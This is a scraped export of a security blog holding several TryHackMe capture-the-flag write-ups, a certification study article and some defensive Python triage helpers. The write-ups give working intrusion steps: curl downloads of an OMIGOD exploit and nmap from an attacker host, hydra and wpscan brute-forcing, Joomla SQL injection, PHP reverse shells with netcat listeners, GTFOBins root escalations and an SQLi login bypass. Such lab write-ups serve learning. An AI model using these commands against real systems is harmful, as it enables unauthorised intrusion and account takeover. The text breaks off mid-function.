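    if not line.startswith("/") and ": /" in line:
        line = "/" + line.split(": /", 1)[1]
    parts = line.split()
    if not parts or not parts[0].startswith("/"):
        return None
    path, clauses = parts[0], parts[1:]
    if clauses and clauses[0] == "=":
        clauses = clauses[1:]
    caps = []
    for clause in clauses:
        m = CLAUSE_RE.match(clause)
        if not m:
            return None
        names, _op, flags = m.groups()
        caps.extend((name, flags) for name in names.split(","))
    return path, caps


def triage(lines):
    """Walk getcap output and return the findings worth acting on, in input order."""
    findings = []
    for line in lines:
        parsed = parse_getcap_line(line)
        if not parsed:
            continue
        path, caps = parsed
        base = os.path.basename(path)
        for name, flags in caps:
            if name not in DANGEROUS_CAPS:
                continue
            # +e: the capability is active on exec, so an interpreter can use it at once.
            # +p only: the program must raise it itself first (capset); harder from a script.
            severity = "immediate" if "e" in flags else "latent"
            note = DANGEROUS_CAPS[name]
            if base.startswith(INTERPRETERS):
                note += "; interpreter, see the GTFOBins capabilities entry"
            findings.append(CapFinding(path, name, flags, severity, note))
    return findings


# Constructed sample; the python3.7 line is the one linpeas printed in the write-up.
SAMPLE_OUTPUT = """\
Files with capabilities (limited to 50): /usr/bin/python3.7 = cap_setuid+ep
/usr/bin/ping cap_net_raw=ep
/usr/bin/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/local/bin/perl cap_setuid=p
"""

if __name__ == "__main__":
    for f in triage(SAMPLE_OUTPUT.splitlines()):
        print(f"[{f.severity:9}] {f.path}: {f.cap}+{f.flags}: {f.note}")
```

cap_net_raw on ping is the normal case and is left alone; the perl line shows why the effective bit matters: with only +p the capability is present but a plain script cannot use it without first raising it, whereas python3.7 with +ep is exploitable with the one-liner above.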
Using a static nmap binary, because many containers lack nmap and a statically linked build has no library dependencies to satisfy.\nOn the attacker machine (your machine):\nstatic-binaries/binaries/linux/x86_64/nmap at master · andrew-d/static-binaries (various *nix tools built as statically-linked binaries, github.com)\n# download the static nmap binary (x86_64) from a repo you trust\n# then serve it:\ncd ~/Downloads\npython -m http.server\nOn the container, fetch and run it:\ncurl http://10.9.1.120:8000/nmap -o nmap\nchmod +x nmap\nifconfig\n./nmap 172.17.0.1 -p- --min-rate 5000\n172.17.0.1 is the default Docker bridge gateway, i.e. the host itself as seen from inside the container. The scan found 5986/tcp open (unknown): on Windows, port 5986 is WinRM over HTTPS, but on a Linux host it is the HTTPS listener of Microsoft OMI, the management agent affected by the OMIGOD bugs, and that is what it is in this lab.\nOn Kali, serve the OMIGOD PoC:\nhttps://github.com/CyberMonitor/CVE-2021-38648/blob/main/CVE-2021-38647.py\ncd ~/Downloads\npython3 -m http.server 8000\nOn the container, download and run the PoC against the internal host IP:\ncurl http://10.9.1.120:8000/CVE-2021-38647.py -o CVE-2021-38647.py\npython3 CVE-2021-38647.py -t 172.17.0.1 -c \"cat /root/root.txt\"\nWhat it does: the PoC targets the OMIGOD vulnerability CVE-2021-38647 (an unauthenticated RCE in OMI: a management request sent without an Authorization header is executed as root) on the host (172.17.0.1). The -c argument is the command to run, and its output is returned.\nResult: the PoC prints the host root flag:\nTHM{7f147ef1f36da9ae29529890a1b6011f}\nCONCLUSION:\nI hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well.
I plan on putting out more like these in the future!\nBeing honest using linpeas.sh and solving this room had me confused and I did take a lot of help from PenguinSecurity and I found it really helpful and this helped me learn something new as well as navigate through this .\nhttps://youtu.be/MUU7LAKOQYs -\u0026gt; This is the link of PenguinSecurity for anyone who prefer it instead of the writeup :)\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"23 September 2025","externalUrl":null,"permalink":"/writeups/tryhackme/oh-my-webserver-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"OH MY WEBSERVER -TRY HACK ME- ROOM","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Library” LIBRARY-TRY HACK ME-ROOMHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Library”\nThis room is classified as easy and is a ctf-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! 
:)\nWe start by visiting the victim IP in a browser and note the theme: a Boot2Root page for BSides Guatemala with some obvious content.\nThe comments section on the page shows three users, Root, www-data and Anonymous, plus the post author meliodas; these are hints for usernames to try.\nNext I scanned the host to find listening services:\nrustscan -a 10.201.0.32\nResult: ports 22 and 80 open.\nSince port 80 was open, I ran a directory scan to find obvious files and endpoints.\ngobuster dir -u http://10.201.0.32 -w /usr/share/dirb/wordlists/common.txt\nResult: found /images and /robots.txt\nOpen /robots.txt and /images in the browser.\n/images contained 4 PNG files.\n/robots.txt (the usual strategy lol) had a curious entry: User-agent: rockyou\nTaking the meliodas username from the landing page, I ran a password-list attack over SSH using hydra:\nsudo hydra -l meliodas -P /home/kali/Downloads/rockyou.txt 10.201.0.32 ssh -t 4\n-l meliodas sets the single username to try.\n-P /home/kali/Downloads/rockyou.txt points to the password list.\n10.201.0.32 ssh tells hydra to target SSH on the host.\n-t 4 sets the number of parallel tasks to 4 (hydra’s default is 16; hydra itself recommends 4 for SSH, since most SSH servers limit concurrent connections and start dropping them otherwise).\nI used rockyou.txt because of the earlier robots.txt hint.\nNext, SSHing into the box:\nssh meliodas@10.201.0.32\nEntering the password:\nls -la\ncat user.txt\n6d488cbb3f111d135722c33cb635f4ec\nImmediately checking the permissions set for escalation:\nsudo -l\nFor those wondering why:\nsudo -l lists which commands the current user may run with sudo (and whether a password is required).\nThis can reveal NOPASSWD or restricted commands that we can abuse to get root.\nThen we get this output:\n(ALL) NOPASSWD: /usr/bin/python* /home/meliodas/bak.py\nThis line means the meliodas user can run /home/meliodas/bak.py through any /usr/bin/python* binary as root without being prompted for a password.\nIf we can control /home/meliodas/bak.py (or replace it), we can execute arbitrary code as root.\nAlong with user.txt we did see the bak.py file; inspecting it:\ncat bak.py\nWe
see Python code there. The ls -la output shows the file is owned by root and not writable by us, so editing it in place isn’t possible.\nWhat we do control is the directory: /home/meliodas belongs to meliodas, and deleting a file only needs write permission on its directory, not on the file itself. So we remove bak.py and create a new file with the same name containing our payload. The sudo rule only checks the path, not who owns whatever is at that path.\nrm bak.py\n# confirm deletion\nnano bak.py\nThe exploit:\n#!/usr/bin/env python\nimport pty\npty.spawn(\"/bin/bash\")\nUsing cat to open the newly made bak.py and confirm the exploit is present. After saving it, I automatically feel it’s python3, but just to confirm:\nwhich python3\nThis shows the path to the Python 3 binary, /usr/bin/python3, which is matched by the /usr/bin/python* wildcard in the sudo rule.\nThen running the exploit:\nsudo /usr/bin/python3 /home/meliodas/bak.py\nWhat happens is: pty.spawn(\"/bin/bash\") spawns an interactive shell, and because the script is run via sudo, the spawned shell is a root shell.\nNow that we are root, it’s a quick move from here (as long as there are no obstacles in front):\nwhoami (confirms that we are root)\nls -la\ncd /root (enter the root directory)\nls -la (shows all the files and permissions)\ncat root.txt\ne8c8c6c256c35515d1d344ee0488c617\nCONCLUSION:\nI usually post on Sundays but this post has come a bit delayed and I apologize for the delay 🙇\nI hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. 
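The two conditions that made this escalation work are worth checking mechanically: the sudo rule has a wildcard in the binary and a fixed script argument, and the script sits in a directory we own even though the file itself is root-owned. The following Python is an added example of mine, not code from the room or this writeup. It parses a sudo -l rule line, tests whether each path argument can be replaced by the current user (write access to the file, or write access to its directory with the sticky-bit rule taken into account), and runs that check against a constructed stand-in for bak.py in a temporary directory. The rule format it parses and the scenario it builds are assumptions for illustration.

```python
import os
import re
import stat
import tempfile

# One rule line of `sudo -l` output, e.g.
#   (ALL) NOPASSWD: /usr/bin/python* /home/meliodas/bak.py
SUDO_RULE = re.compile(r"^\((?P<runas>[^)]*)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")


def parse_sudo_rule(line):
    """Split a sudo -l rule into run-as spec, tags (NOPASSWD, SETENV, ...), binary and arguments."""
    m = SUDO_RULE.match(line.strip())
    if m is None:
        return None
    parts = m.group("cmd").split()
    return {
        "runas": m.group("runas"),
        "nopasswd": "NOPASSWD" in m.group("tags"),
        "binary": parts[0],
        "args": parts[1:],
    }


def is_replaceable(path):
    """True if we can get our own content at `path`: either by writing it, or by unlinking
    it and creating a new file, which only needs write permission on the directory."""
    if os.access(path, os.W_OK):
        return True
    directory = os.path.dirname(path) or "."
    if not os.access(directory, os.W_OK):
        return False
    dst = os.stat(directory)
    if dst.st_mode & stat.S_ISVTX and os.path.exists(path):
        # sticky directory (like /tmp): only the file owner or the directory owner may unlink
        me = os.getuid()
        return os.stat(path).st_uid == me or dst.st_uid == me
    return True


def assess(line):
    """Parse one rule and list why it is exploitable from the current user's point of view."""
    rule = parse_sudo_rule(line)
    if rule is None:
        return None
    findings = []
    if rule["nopasswd"]:
        findings.append("NOPASSWD: no authentication needed")
    if "*" in rule["binary"]:
        findings.append("wildcard in binary path: any matching interpreter is allowed")
    for arg in rule["args"]:
        if arg.startswith("/") and is_replaceable(arg):
            findings.append(f"argument {arg} can be replaced by the current user")
    rule["findings"] = findings
    return rule


def demo():
    """Constructed scenario mirroring bak.py: a read-only script inside a directory we own."""
    with tempfile.TemporaryDirectory() as home:
        script = os.path.join(home, "bak.py")
        with open(script, "w") as fh:
            fh.write("print('backup')\n")
        os.chmod(script, 0o444)  # not writable in place, like the root-owned original
        return assess(f"(ALL) NOPASSWD: /usr/bin/python* {script}")["findings"]


if __name__ == "__main__":
    for finding in demo():
        print("-", finding)
```

The defensive reading is the same check in reverse: a script referenced from sudoers should live in a root-owned directory that ordinary users cannot write to, or the ownership of the file itself buys nothing.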
Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"15 September 2025","externalUrl":null,"permalink":"/writeups/tryhackme/library-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"LIBRARY-TRY HACK ME-ROOM","type":"writeups"},{"content":" Debugging the CTFL\nFrom THM Room Walkthroughs to Testing Fundamentals: How I Passed the ISTQB CTFL v4.0 Exam\nGuess who’s back, back again? (lol I know no one cares)\nI know no one was waiting on this, but I missed it. I missed writing walkthroughs. I missed breaking things down. I missed putting something out there that might help someone, even just one person, make sense of something new.\nSo yeah — I’m back. Not with a usual walkthrough. Instead, this one time, it’s the one and only:\nISTQB Certified Tester Foundation Level v4.0\nWhy This? Why Now?\nRecently, I faced a situation that pulled me into the world of security testing in a real-world context with an organisation — and it forced me to confront how little I knew about the software testing domain. Sure, I knew a couple of things. But when it came to understanding how systems are tested from a process and quality perspective and understanding terms and processes, I had gaps.\nThat’s when I came across the ISTQB Certified Tester Foundation Level (CTFL) exam — a globally recognized cert that teaches the fundamentals of testing:\n- Fundamental terminology of testing concepts\n- How testing fits into the SDLC\n- Black-box and white-box techniques\n- Risk-based testing\n- Agile approaches\n- Test case design\n- Defect life cycles and more\nWhether or not this cert is required depends on your role.\nBut for me — transitioning, pivoting, and trying to upskill in a new direction — it felt like the right move. 
It gave me a structured way to build some understanding from scratch.\nQuick Disclaimer\nBefore we go further — let’s clear the air.\nThe ISTQB CTFL is one of those certs that people have strong opinions about. Some think it’s essential for breaking into QA or testing roles. Others think it’s too academic, outdated, or unnecessary in real-world scenarios.\nHere’s the thing: I’m not here to debate its worth.\nDepending on the company, the role, or the country — this cert might be a checkbox requirement, a nice-to-have, or totally irrelevant.\nWhether you choose to take it or not is up to you.\nNo gatekeeping here. Just sharing my experience — please do take what’s useful, leave what’s not :)\nWhat Even Is the CTFL?\nFor those who are new and unfamiliar:\nIt’s an entry-level certification for software testing that covers the core principles, techniques, and processes used in structured testing environments.\nThe v4.0 version is the most recent syllabus, updated to reflect more modern practices — including Agile, continuous delivery, and risk-based testing. It’s no longer stuck in the waterfall-only world.\nWhat It Covers\nThe CTFL exam is designed to test your understanding of:\n- The software test process — from planning to reporting\n- Testing throughout the software development life cycle (SDLC)\n- Static testing — like reviews and walkthroughs\n- Test techniques — black-box, white-box, and experience-based\n- Test management — roles, responsibilities, metrics\n- Agile testing fundamentals\n- Tools that support testing\nNothing super advanced — but a lot of terminology, theory, and framework thinking.\nExam Format\n- 40 multiple-choice questions\n- 60 minutes total\n- Closed book\n- 65% to pass (26/40)\n- Taken online (proctored) or at a test center\n- Based directly on the syllabus\nHow I Prepared\nI gave myself around 2–3 weeks of casual but focused prep.\nHere’s the approach that worked for me:\n1. Start with the Syllabus\nThe official ISTQB CTFL v4.0 syllabus is the bible for this exam. 
It maps out every learning objective, topic, and what you need to know.\nFirst pass: skim to get the big picture.\nSecond pass: deep dive, making notes and highlighting key points.\n2. Practice Tests — Your Best Friend\nI grabbed unofficial mock tests from various corners of the internet and did them early and often. These helped me:\n- Get used to the question style — which is subtle, sometimes tricky\n- Pinpoint weak spots (like test module 4) {It really had me suffering at a point haha}\n- Build confidence with the terminology\nI would say practice tests played a crucial role in my improvement. They helped me a lot, and with each test, my understanding deepened. This gradually helped me grasp concepts better, which naturally led to my scores improving.\nResources used specifically:\nhttps://www.udemy.com/course/istqb-foundation-level-practice-exams/\nhttps://www.udemy.com/course/istqb-foundation-level-syllabus-sample-exams/\nhttps://www.udemy.com/course/certified-tester-foundation-level-ctfl/\nhttps://www.linkedin.com/posts/bhavin-thumar_istqb-foundation-cheat-sheet-activity-7202489038933524480-Zo_M\n3. Use Videos or GPT for Concept Clarity\nWhen I hit concepts that felt dry or confusing — like the difference between verification and validation — I watched short explainer videos on YouTube.\nAnother tip is to run it through GPT; that really worked for understanding specific concepts, asking it to tweak them and return questions to understand them better.\n4. Memorize the Glossary\nI ignored this at first and paid for it later. The ISTQB Glossary is your friend. 
Many questions hinge on precise definitions — like error vs defect vs failure.\nBooking the exam\nBefore you register, it’s important to understand that ISTQB works through a network of Member Boards, and choosing the right one matters.\nE.g., ASTQB (USA), BCS (UK), ISQI (European), Indian Testing Board (ITB), ANZTB (Australia/New Zealand). They cater primarily to local candidates but allow international bookings in many cases.\nSome organizations allow either a test-center-based exam or a remote proctored one.\nThere are various exam options; in our case it’s ISTQB CTFL v4.0.\nAll ISTQB certifications are globally valid and recognized.\nHowever, your certificate will carry the name of the issuing board or provider, which might influence:\n- Exam language availability\n- Support and rebooking policies\n- Training partnerships and discounts\nFinal Thoughts\nTaking the ISTQB CTFL wasn’t about chasing a fancy credential — it was about closing gaps, building a foundation in a field I was sliding into, and getting comfortable with concepts I’d overlooked.\nNo, it won’t suddenly make you a senior QA engineer, and of course it won’t replace hands-on experience.\nBut it will give you structure, vocabulary, and a solid base to build from — whether you’re moving into QA or testing, or just trying to understand the software quality and testing world better.\nSo if you’re like me — in transition, curious, or trying to connect the dots — the CTFL might just be worth your time.\nAnd at the very least, you’ll walk away knowing the difference between a defect, a failure, and an error, or the answer to the common question of whether testing and QA are the same haha — which is more than most.\n","date":"7 September 2025","externalUrl":null,"permalink":"/articles/certifications/debugging-the-ctfl/","section":"Security Research \u0026 Articles","summary":"","title":"Debugging the CTFL","type":"articles"},{"content":" Hello everyone! 
This room gave off immediate nostalgic vibes, but we’re here for exploits — although, fun bonus if you’re a Spidey fan. This room is from the TryHackMe platform titled “Daily Bugle”\nDAILY BUGLE-TRY HACK ME-ROOM\nThis room is classified as a hard challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nIf you know you know\nWe start by visiting the target IP in the browser:\nhttp://10.10.187.73\nWe’re greeted by a Daily Bugle themed website showing Spider-Man robbing a bank. Classic misdirection.\nThere’s a login page, and from the look of the design and page structure, I quickly check the source and notice Joomla CMS is involved here.\nTo enumerate the open services, we go ahead with port scans:\nrustscan -a 10.10.187.73\nWe discover the following open ports:\n22 (SSH)\n80 (HTTP)\n3306 (MySQL, MariaDB)\nTo confirm the CMS and version, we hit a classic Joomla fingerprinting route:\nhttp://10.10.187.73/administrator/manifests/files/joomla.xml\nThis reveals:\n\u0026lt;version\u0026gt;3.7.0\u0026lt;/version\u0026gt;\nJoomla 3.7.0 is affected by CVE-2017-8917, an unauthenticated SQL injection, which is what we use next.\nI search for a known exploit and find this GitHub repo:\nhttps://github.com/stefanlucas/Exploit-Joomla (CVE-2017-8917 SQL injection exploit for Joomla 3.7.0)\nWe download the script using wget:\nwget https://raw.githubusercontent.com/stefanlucas/Exploit-Joomla/refs/heads/master/joomblah.py\nNext,\npython3 
joomblah.py http://10.10.187.73\nThe script dumps database details, and in particular:\nTable: fb9j5_users\nUser: jonah\nHash: $2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm\nWe now have:\nUsername: jonah\nEmail: jonah@tryhackme.com\nPassword hash: bcrypt, recognisable from the $2y$ prefix (the $10$ after it is the cost factor, 2^10 rounds per guess, which is why each guess is slow and a targeted wordlist matters)\nNow we need to crack the hash. Create a file to store it:\nnano joomhash\nPaste the hash into it. Then run John:\njohn --wordlist=/home/kali/Downloads/rockyou.txt joomhash\nJohn cracks it pretty quickly:\nspiderman123\nA lot of similarity to my style of working lol\nNow that we have cracked the hash we need to use the creds and log in:\nhttp://10.10.187.73/administrator/\nUse the credentials:\nUsername: jonah\nPassword: spiderman123\nBoom! And we’re in.\nNow after reading up a bit I found out where we can go to execute our reverse shell.\nWe move to the Template Editor:\nExtensions ➝ Templates ➝ Protostar ➝ index.php\nReplace the code with a PHP reverse shell (make sure to configure your IP and port). Protostar is the active site template, so once saved, any request to the front page runs our shell. Start your listener first:\nnc -lvnp 4444\nThen trigger the shell in the browser:\nhttp://10.10.187.73/index.php\nAnd boom, shell caught! 
Stabilize the shell (if needed):\npython3 -c 'import pty; pty.spawn(\"/bin/bash\")'\nNow escalating privilege.\nTrying to access the jjameson home directory:\ncd /home/jjameson\ncat user.txt\nPermission denied\nTo search for some credentials and get a lead we explore the default document root for web servers:\ncd /var/www/html\ncat configuration.php\nconfiguration.php is the file Joomla uses to store its settings, including the database credentials; it is a common filename for PHP applications to store their configuration. From this we get:\n$password = 'nv5uz9r3ZEDzVjNu'\nThis is the database password, but password reuse is common, so let’s try it to switch user:\nsu jjameson\nPassword: nv5uz9r3ZEDzVjNu\nand this works. Next let’s get the user flag:\ncat user.txt\n27a260fe3cba712cfdedb1c86d80442e\nNow escalating privilege to root.\nCheck for sudo permissions:\nsudo -l\nOutput shows:\n(ALL) NOPASSWD: /usr/bin/yum\nImmediately when I see this I head to GTFOBins. The yum entry there gives a way to escalate: yum runs the install scripts of the package you ask it to install as root, so a package whose pre-install script runs our command gets us root. The steps used were:\nsudo yum -y install yum\nTF=$(mktemp -d)\necho 'id' \u0026gt; $TF/x.sh\nchmod +x $TF/x.sh\nsudo yum -y localinstall $TF/x.sh\nNote that yum localinstall only accepts .rpm files; the GTFOBins entry packages x.sh into an RPM (with fpm) before the localinstall step, and you can put a shell such as /bin/bash in place of id. Once we are root:\ncd /root\ncat root.txt\nWe then get the root flag as well:\neec3d53292b1821868266858d7fa6f79\nCONCLUSION:\nI hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\nPS: I’ll be taking a short hiatus as I prepare for a certification exam. I’ll be back very shortly with more content — but until then, feel free to go through any of my walkthroughs, and don’t hesitate to drop comments if you’re stuck or have doubts. 
I’ll still be around to reply and help you out!\n","date":"1 August 2025","externalUrl":null,"permalink":"/writeups/tryhackme/daily-bugle-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"DAILY BUGLE-TRY HACK ME-ROOM","type":"writeups"},{"content":" COLDDBOX-TRY HACK ME-ROOM\nHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “COLDDBOX”\nThis room is classified as easy and is a walkthrough-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\n100% worth the rewatch after completing this room\nI start by visiting the website: a simple site made by Coldd, and it’s built on WordPress.\nI also start nmap:\nnmap 10.10.83.227\nThis scans the target for open ports (add -sV if you also want service versions).\nKnowing it’s WordPress we go to /wp-login.php\nNow using wpscan:\nwpscan --url http://10.10.83.227/ --enumerate u\n--url: Specifies the WordPress site URL.\n--enumerate u: Attempts to enumerate valid WordPress usernames.\nOutput: reveals 3 users: hugo, c0ldd, and Philip.\nNow we know c0ldd is the person who made the website, so using his username let's brute-force the password:\nwpscan --url http://10.10.83.227/ --usernames c0ldd --passwords /home/kali/Downloads/rockyou.txt\nThis uses rockyou.txt to brute-force the password for c0ldd.\nEventually, we get the password: 9876543210\nUsing these credentials we log in and see the dashboard.\nAs per usual I feel it has to be the revshell again:\n- Going to Appearance and then Theme Editor, we paste the reverse shell code.\n- Then modify the IP 
and port appropriately.\n- I select the 404 template, then click Update File.\nThen opening the listener:\nnc -lvnp 1234\nNow based on our page we trigger the modified template:\nhttp://10.10.83.227/wp-content/themes/twentyfifteen/404.php\nReverse shell connects back.\npython3 -c 'import pty; pty.spawn(\"/bin/bash\")'\nThis upgrades the shell to a fully interactive pseudo-terminal.\nThen going to /home -\u0026gt; /c0ldd and trying to read user.txt, but it shows permission denied.\nSo we try SUID binary enumeration:\nfind / -perm -4000 2\u0026gt;/dev/null\n-perm -4000: matches all files with the SUID bit set (the 4 in the 4000 octal permission).\n2\u0026gt;/dev/null: suppresses permission errors.\nThis command quickly scans the entire filesystem for binaries that can potentially be leveraged to escalate to root from a limited shell. One entry catches our eye:\n/usr/bin/find\nGoing to GTFOBins:\nhttps://gtfobins.github.io/gtfobins/find/\nfind . -exec /bin/sh -p \\; -quit\n-exec: executes a command for each matching file.\n/bin/sh -p: runs a shell with preserved privileges. The -p matters when /bin/sh is bash: bash drops the elevated effective UID unless started with -p (dash does not), so -p is the safe choice.\n-quit: exits after one match to avoid repeating.\nThis drops us into a root shell (id shows euid=0(root)).\nNow capturing the flags:\ncd /home/c0ldd\ncat user.txt\nThis gives the user.txt:\nRmVsaWNpZGFkZXMsIHByaW1lciBuaXZlbCBjb25zZWd1aWRvIQ==\ncd /root\nls -la\ncat root.txt\nThis leads us to the final flag a.k.a the root flag:\nwqFGZWxpY2lkYWRlcywgbcOhcXVpbmEgY29tcGxldGFkYSE=\nCONCLUSION:\nI hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. 
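The find / -perm -4000 step above is a one-liner, but two details decide whether a hit matters: the file has to be root-owned (a SUID bit on a file owned by a normal user gives you that user, not root), and it has to be something with a known escalation path. The Python below is an added example of mine, not code from the room, that does that classification. walk_fs reproduces what find does (lstat so symlinks are not followed, pseudo filesystems skipped), classify applies the SUID-plus-root-owner test and flags names that appear on a small constructed subset of the GTFOBins SUID list, and SAMPLE is a constructed set of stat results so the logic can be exercised without scanning a real box.

```python
import os
import stat

# Binaries with a documented SUID escalation on GTFOBins (constructed subset for this example;
# the real list is longer and should be taken from https://gtfobins.github.io/)
GTFOBINS_SUID = {"find", "bash", "sh", "vim", "python3", "env", "cp", "mv", "nmap", "perl", "awk", "less"}

# Pseudo filesystems that only slow the walk down and never hold real binaries
SKIP = {"/proc", "/sys", "/dev", "/run"}


def is_suid_root(mode, uid):
    """find's -perm -4000 plus an owner check: the bit only buys root if root owns the file."""
    return bool(mode & stat.S_ISUID) and uid == 0


def classify(entries):
    """entries: iterable of (path, st_mode, st_uid). Returns sorted (path, abusable) pairs
    for every regular file that is SUID and root-owned."""
    hits = []
    for path, mode, uid in entries:
        if stat.S_ISREG(mode) and is_suid_root(mode, uid):
            hits.append((path, os.path.basename(path) in GTFOBINS_SUID))
    return sorted(hits)


def walk_fs(root="/"):
    """Yield (path, mode, uid) for the whole tree. lstat is used so a symlink's own mode
    is examined rather than its target's, matching what find reports."""
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda err: None):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable entry, the equivalent of 2>/dev/null
            yield path, st.st_mode, st.st_uid


# Constructed stat results standing in for a real scan (modes include the file-type bits)
SAMPLE = [
    ("/usr/bin/find", stat.S_IFREG | 0o4755, 0),        # SUID root and on the GTFOBins list
    ("/usr/bin/passwd", stat.S_IFREG | 0o4755, 0),      # SUID root, expected and not abusable
    ("/usr/bin/ls", stat.S_IFREG | 0o755, 0),           # no SUID bit
    ("/home/c0ldd/tool", stat.S_IFREG | 0o4755, 1000),  # SUID but owned by a normal user
    ("/opt/odd-dir", stat.S_IFDIR | 0o4755, 0),         # directory, not a binary
]


if __name__ == "__main__":
    for path, abusable in classify(walk_fs()):
        print(("ABUSABLE  " if abusable else "          ") + path)
```

Run as-is it scans the live filesystem; the unit checks below only exercise SAMPLE. Once find shows up as abusable, the shell still has to be started with -p, as noted above, or the elevated effective UID is thrown away before you get a prompt.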
Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"27 July 2025","externalUrl":null,"permalink":"/writeups/tryhackme/colddbox-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"COLDDBOX-TRY HACK ME-ROOM","type":"writeups"},{"content":" LESSON LEARNED-TRY HACK ME-ROOM\nHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Lesson Learned”\nThis room is classified as easy, and what seems like a standard challenge needs a little more subtlety. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nI navigated to the victim’s IP in the browser. It presented a simple login form, classic setup. I reached straight for my usual SQLi bypass payload.\nUnfortunately, this immediately returned an error. The page responded with something indicating SQL injection was detected.\nSo clearly, this application had basic detection in place to block destructive or obvious payloads.\nAt this point, the box was considered broken due to failed attempts — I terminated the instance and spun up a fresh one.\nI turned to SQLi variants that were less obvious. Pulled from notes and public payload libraries, I started experimenting with:\nORDER BY 1--\nGROUP BY null--\n' UNION SELECT NULL--\n' OR 'A'='A'--\nBut even when sending these through Burp Suite, none of them worked.\nEither nothing changed on the page or the error messages gave me no useful feedback. 
It was clear brute-forcing blindly wasn’t going to work.\nTime for a change of strategy. The application only gave “Invalid username or password”. That made me think: what if it behaved differently for a correct username?\nSo I decided to do a username enumeration attack by watching for subtle changes in the response.\nLoaded Burp Suite and intercepted a login request.\nCreated an Intruder attack, placing the payload position on the username field.\nSet up my wordlist using: /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt\nFor the password, I kept it as “test” just to get response behavior.\nAfter running the attack, I filtered responses based on length and noticed that for username martin, the message changed to “Invalid password” instead of the usual generic error.\nThat was my signal! Valid username found: martin\nThis is exactly why login forms should return one generic message for both failure cases: a different message for a valid username with a wrong password is an oracle for user enumeration.\nNow that I had the correct username, I could apply a simple SQLi true clause using the comment operator:\nUsername: martin' #\n' closes the username string.\n# comments out the rest of the query (MySQL syntax; other databases use -- followed by a space).\nEffectively, this disables password validation if the username exists, because the AND password='...' part of the query is never evaluated.\nBoom. 🎯 It presented the final flag on the landing page.\nTHM{aab02c6b76bb752456a54c80c2d6fb1e}\nCONCLUSION:\nI hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. 
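Both halves of this room, the username oracle and the comment-based bypass, come from the same two defects: queries built by string concatenation and a failure message that depends on whether the username exists. The Python below is an added example of mine, not code from the room or this writeup, that reproduces that login logic against an in-memory SQLite table, runs the Intruder-style enumeration as a function, performs the bypass, and shows the fixed version beside it. The account, the blocklist and the two-query structure are constructed assumptions about how the room's backend behaves; SQLite treats -- as a comment but not #, so the bypass payload here is martin'-- rather than the martin' # used against MySQL above.

```python
import sqlite3

# Naive "SQL injection detected" filter, like the one that blocked the obvious payloads
BLOCKLIST = ("or 1=1", "union", "order by", "group by")


def make_db():
    """In-memory users table with one constructed account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('martin', 'c0rrect-h0rse')")
    return db


def login_vulnerable(db, username, password):
    """Mirrors the room's behaviour: a keyword blocklist, queries built by string
    concatenation, and a different error depending on whether the username exists."""
    if any(bad in (username + password).lower() for bad in BLOCKLIST):
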